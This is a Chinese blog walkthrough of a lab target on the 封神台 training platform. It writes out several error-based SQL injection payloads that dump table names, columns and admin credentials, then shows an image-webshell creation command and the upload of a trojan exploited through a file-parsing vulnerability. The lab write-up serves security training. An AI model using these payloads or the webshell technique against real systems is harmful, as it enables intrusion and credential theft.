封神台(尤里的复仇),信息收集1--靶场练习,纯手工注入

信息收集1–靶场练习


靶场地址:靶场

开启靶场:

  • 打开就一个网页,平平无奇。
  • 点点功能点,没发现什么可以利用的
  • 尝试扫描一波目录,直接御剑扫描就行,这里使用的是kali的dirsearch,发现了/admin,访问:
    .在这里插入图片描述
  • 先尝试弱口令登录
  • admin admin
  • 在这里插入图片描述
  • 那么尝试sql注入,先加个’ 尝试一下
    在这里插入图片描述
  • 这里回显出sql语句,那么存在sql注入漏洞
  • 尝试报错注入:admin' or extractvalue(1,concat(0x7e,database())) #
    在这里插入图片描述
  • 这里爆出了数据库:caidian
  • 那么说明报错注入有效
  • 接着报错注入:admin' or extractvalue(1,concat(0x7e,@@basedir)) #
  • 在这里插入图片描述
  • 继续:admin' or gtid_subset(concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="caidian")),1) #
    在这里插入图片描述
  • 这里发现了manage 表,一般账号密码都保存在一些敏感目录,直接查看其中的列:admin' or gtid_subset(concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="manage")),1) #

在这里插入图片描述

  • 果然如此,发现了user,name,password等,那么继续:admin' or gtid_subset(concat(0x7e,(select group_concat(concat(user,name,password)) from caidian.manage)),1) #
  • 在这里插入图片描述
  • 这里发现了其中的user,password等内容,但是其中密码一般会采用md5加密,那么将后面的密码密文找到md5解密网站解密得到其中的zkaqsea账户的密码为:seazkaq

在这里插入图片描述

登录后台,尝试获取权限

采用sql注入出来的用户名密码登录后台
在这里插入图片描述
也是成功登录,直接点击可用功能点,逐个测试,没有找到相关的信息,那么就想办法getshell了
在这里插入图片描述

这里发现上传点,并且好像只能上传图片格式,那么只能写一个图片马,上传!

copy 11.jpg /b +3.asp /a 22.jpg #将图片文件(qq.png)和一句话木马文件(guo.asp)合称为同一个文件(test.jpg)
在这里插入图片描述
上传后,发现这里的中间件版本
在这里插入图片描述
这里存在文件解析漏洞,那么可以通过这个漏洞,完成getshell
那么这里访问刚才上传成功的jpg文件,后面加上/.php
在这里插入图片描述
看到访问页面为乱码,这就说明解析漏洞利用成功了,那么直接菜刀连接:
密码是刚才图片马中的值
在这里插入图片描述

  • 小tips:
  • 这里的flag在fannu–>files–>config.php文件中
    在这里插入图片描述

参考链接

`

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值